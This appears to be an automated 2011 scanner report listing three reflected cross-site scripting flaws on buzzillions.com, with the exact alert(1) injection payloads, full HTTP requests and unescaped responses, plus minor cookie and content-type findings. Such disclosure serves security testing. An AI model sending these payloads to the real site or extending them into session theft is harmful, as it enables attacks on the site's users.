XSS, buzzillions.com, Cross Site Scripting

XSS in www.buzzillions.com | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 09:27:47 CST 2011.



DORK CWE-79 XSS Report

Loading

1. Cross-site scripting (reflected)

1.1. http://www.buzzillions.com/reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 [REST URL parameter 2]

1.2. http://www.buzzillions.com/reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 [REST URL parameter 2]

1.3. http://www.buzzillions.com/reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 [REST URL parameter 2]

2. Cookie without HttpOnly flag set

3. Content type incorrectly stated



1. Cross-site scripting (reflected)  next
There are 3 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.buzzillions.com/reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 59ab9</title><script>alert(1)</script>4e54375ce26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /reviews/59ab9</title><script>alert(1)</script>4e54375ce26/x22 HTTP/1.1
Host: www.buzzillions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 21:49:44 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Sun, 31-Jan-2021 21:49:44 GMT; Path=/
Set-Cookie: lapg=%2Freviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22%3FN%3D0%26D%3Dx%26Ntt%3Dreviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22%26top%3Dyes; Expires=Sun, 31-Jan-2021 21:49:44 GMT; Path=/
Set-Cookie: oref=""; Expires=Sun, 31-Jan-2021 21:49:44 GMT; Path=/
Set-Cookie: bzid=1296769784292; Expires=Sun, 31-Jan-2021 21:49:44 GMT; Path=/
Set-Cookie: JSESSIONID=C184320DF1036E3FFFE2C9F230AFB45D.furyportal; Path=/
Content-Language: en
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 27134

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<title>Buzzillions.com - Search for &#8220;reviews/59ab9</title><script>alert(1)</script>4e54375ce26/x22&#8221;</title>
...[SNIP]...

1.2. http://www.buzzillions.com/reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c455e'%3balert(1)//fdc072ec141 was submitted in the REST URL parameter 2. This input was echoed as c455e';alert(1)//fdc072ec141 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/c455e'%3balert(1)//fdc072ec141/x22 HTTP/1.1
Host: www.buzzillions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 21:49:42 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Sun, 31-Jan-2021 21:49:42 GMT; Path=/
Set-Cookie: lapg=%2Freviews%2Fc455e%27%3FN%3D0%26D%3Dx%26Ntt%3Dreviews%2Fc455e%27%3Balert%281%29%2F%2Ffdc072ec141%2Fx22%26top%3Dyes; Expires=Sun, 31-Jan-2021 21:49:42 GMT; Path=/
Set-Cookie: oref=""; Expires=Sun, 31-Jan-2021 21:49:42 GMT; Path=/
Set-Cookie: bzid=1296769782702; Expires=Sun, 31-Jan-2021 21:49:42 GMT; Path=/
Set-Cookie: JSESSIONID=3E5B3D0DD9811F0B99BA32EBCB8EA2F2.visionportal; Path=/
Content-Language: en
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 26564

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<script>bZ.events.handlers.zeroResults('reviews/c455e';alert(1)//fdc072ec141/x22');</script>
...[SNIP]...

1.3. http://www.buzzillions.com/reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 [REST URL parameter 2]  previous

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 610a7<script>alert(1)</script>e398f29f414 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /reviews/610a7<script>alert(1)</script>e398f29f414/x22 HTTP/1.1
Host: www.buzzillions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 21:49:43 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Sun, 31-Jan-2021 21:49:43 GMT; Path=/
Set-Cookie: lapg=%2Freviews%2F610a7%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee398f29f414%2Fx22%3FN%3D0%26D%3Dx%26Ntt%3Dreviews%2F610a7%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee398f29f414%2Fx22%26top%3Dyes; Expires=Sun, 31-Jan-2021 21:49:43 GMT; Path=/
Set-Cookie: oref=""; Expires=Sun, 31-Jan-2021 21:49:43 GMT; Path=/
Set-Cookie: bzid=1296769783501; Expires=Sun, 31-Jan-2021 21:49:43 GMT; Path=/
Set-Cookie: JSESSIONID=53936D12D95B3B989389E8D7395B2528.snowbird1portal; Path=/
Content-Language: en
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 26907

<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta name="verify-v1" con
...[SNIP]...
<span style="color: #74B74A);" class="bz-emphasize">"reviews/610a7<script>alert(1)</script>e398f29f414/x22"</span>
...[SNIP]...

2. Cookie without HttpOnly flag set  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buzzillions.com
Path:   /reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

Request

GET /reviews/kids-abc-development-inc-cntrl-sesame-street-water-teether-reviews/x22 HTTP/1.1
Host: www.buzzillions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 03 Feb 2011 21:48:43 GMT
Server: Apache/2.2.9 (Unix)
Set-Cookie: cref=""; Expires=Sun, 31-Jan-2021 21:48:43 GMT; Path=/
Set-Cookie: lapg=%2Freviews%2Fkids-abc-development-inc-cntrl-sesame-street-water-teether-reviews%2Fx22%3Fcategory%3Dabc-development-inc-cntrl-sesame-street-water-teether%26brand%3Dreviews%26gender%3Dkids; Expires=Sun, 31-Jan-2021 21:48:43 GMT; Path=/
Set-Cookie: oref=""; Expires=Sun, 31-Jan-2021 21:48:43 GMT; Path=/
Set-Cookie: bzid=1296769723899; Expires=Sun, 31-Jan-2021 21:48:43 GMT; Path=/
Location: /kids-reviews
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


3. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.buzzillions.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /favicon.ico HTTP/1.1
Host: www.buzzillions.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E87D4B444AF0C90074C29DAD4FF5CA63.snowbirdportal; myProductList=BZEMPTY; recentlyViewed=BZEMPTY

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:59:58 GMT
Server: Apache/2.2.9 (Unix)
Last-Modified: Wed, 22 Sep 2010 23:48:40 GMT
ETag: "13e"-gzip
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 318

..............(.......(....... .......................................#...X...\...................+...r..............................@7wwwwwws.w9ww.wx.w=7s.wq.w....wq.wu..Wwq.w{...wq.w....wq.......q.;
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Fri Feb 04 09:27:47 CST 2011.